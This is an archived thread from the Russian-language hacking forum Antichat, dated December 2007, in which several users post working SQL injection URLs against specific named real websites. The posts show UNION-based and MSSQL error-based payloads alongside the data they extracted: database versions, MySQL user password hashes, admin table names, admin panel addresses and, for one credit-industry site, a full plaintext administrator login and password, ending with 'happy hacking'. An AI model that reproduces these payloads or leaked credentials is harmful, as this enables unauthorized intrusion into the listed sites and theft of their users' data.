ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.12.2007, 18:58
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
http://www.awdf.org/
Код:
http://www.awdf.org/pages/?pid=2&sid=-1+union+select+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/*
root:59b5b2b07b506bfa
Версия мускула пятая, так что можно перебирать все таблицы, у меня почему-то сайт начинает глючить при переборе....
Код:
http://www.awdf.org/pages/?pid=2&sid=-1+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+0,1/*
http://www.akulovagora.ru/
Код:
http://www.akulovagora.ru/page.php?pid=-1'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/*
|
|
|

28.12.2007, 19:04
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 69
Провел на форуме: 348179
Репутация:
52
|
|
Фото студия))
http://www.2dstudio.ru/photo.php?id=-850+union+select+1,2,Version(),4/*
А вот еще их админка
http://www.2dstudio.ru/admin/
Последний раз редактировалось Loker; 28.12.2007 в 19:12..
|
|
|

28.12.2007, 19:30
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме: 2337678
Репутация:
354
|
|
www.tensor-manpower.com
http://www.tensor-manpower.com/view-job.php?id=-229+uni0n+select+concat(password,0x3a,user)+from+m ysql.user+limit+0,1/*
3ba5ce1201df700e: admin
4537bc5250b6bf11: orders
|
|
|

28.12.2007, 21:11
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме: 2337678
Репутация:
354
|
|
www.downtowncrossing.org
http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,concat(version(),0x3a,user(),0x 3a,database()),3,4+from+members/*
4.1.20-standard :dca@beedrill.valueweb.net: dca
Названия полей подобрать неудалось.
|
|
|

28.12.2007, 22:43
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
http://www.scripofilia.it/
Код:
http://www.scripofilia.it/product.asp?pid=1+or+1=(SELECT+TOP+1+cast(user_username+as+nva rchar)%2B%27%3A%27%2Bcast(user_PASSWORD+as+nvarchar)+from+userS)--
http://www.dataplace.to/
Код:
http://www.dataplace.to/newhotel.asp?id=1+or+1=(SELECT+TOP+1+cast(logon_name+as+nvarch ar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+administrator+where+administrator_id=1)--
|
|
|

28.12.2007, 22:49
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме: 5076186
Репутация:
778
|
|
Сообщение от 159932
есть member
для паса не нашёл
хацкеры. таблица - admin , колонки - username, password
|
|
|

28.12.2007, 23:17
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме: 2337678
Репутация:
354
|
|
www.ateme.com
http://www.ateme.com/career/job.php?id=-73+union+select+1,2,3,4,convert(concat(version(),0 x3a,user(),0x3a,database())+using+latin1),6,7,8,9, 10+from+user/*
4.1.11-Debian_4sarge7-log: atemeweb@localhost: atemeweb
Опять не подобрал поля. Таблицы admin нету 
|
|
|

28.12.2007, 23:46
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
http://www.creditman.biz/ The UK's Leading Resource for Businesses and Credit Professionals
Админ этого сайта параноик, мало того, что он насоздавал с десяток фейковых таблиц содержащих название admin, колонки с логинами и паролями и т.д. Его логин и пароль состоят из 64 символов каждый!!! Хотя с другой стороны с финансами связано...
Вывожу по отдельности, так как вместе не помещается при выводе:
Логин: $uC&b+bAz&!#+e@6*cR5yaHec-utr?th7kustuz&ZuDrusp6mAweswAcre7Wu3Ab
Код:
http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+username+from+Administration)--
Пароль: #r@kep*uX_th*b2xutRa52rey-paruna$ukeG5*Hep-phe9aj#swapeth7Phachu
Код:
http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+password+from+Administration)--
Админка: https://www.creditman.biz/uk/admin/default.asp
Удачного взлома=)
|
|
|

28.12.2007, 23:47
|
|
Познающий
Регистрация: 25.11.2007
Сообщений: 55
Провел на форуме: 493288
Репутация:
58
|
|
http://www.education.ex.ac.uk/dll/pages.php?id=-242+union+select+1,2,3,4,5,concat(user(),0x3a,data base(),0x3a,version()),7,8,9,10,11,12/*
sell@tuffet.ex.ac.uk:sell:4.1.20-log
а дальше непохек =\
|
|
|

29.12.2007, 01:16
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
http://www.sopka.net/?pg=1&id=106106&owner=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*
4.0.27-max-log/tiba102/tiba102@v3.valuehost.ru
-----------------------------------------------------------------------------
http://www.probilliard.info/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,9,10,11/*
4.0.27-log/vh04971/vh04971@zvm7.host.ru
-----------------------------------------------------------------------------
http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,version(),database( ),user())/*
5.0.45-log/u33748/u33748@10.10.223.204
http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,login,password)+fro m+u33748_otelrent.b_users+limit+0,1/*
логин/хеш в title
root/be601c6844923ee53211c35603ff0b52
Последний раз редактировалось ElteRUS; 29.12.2007 в 01:20..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|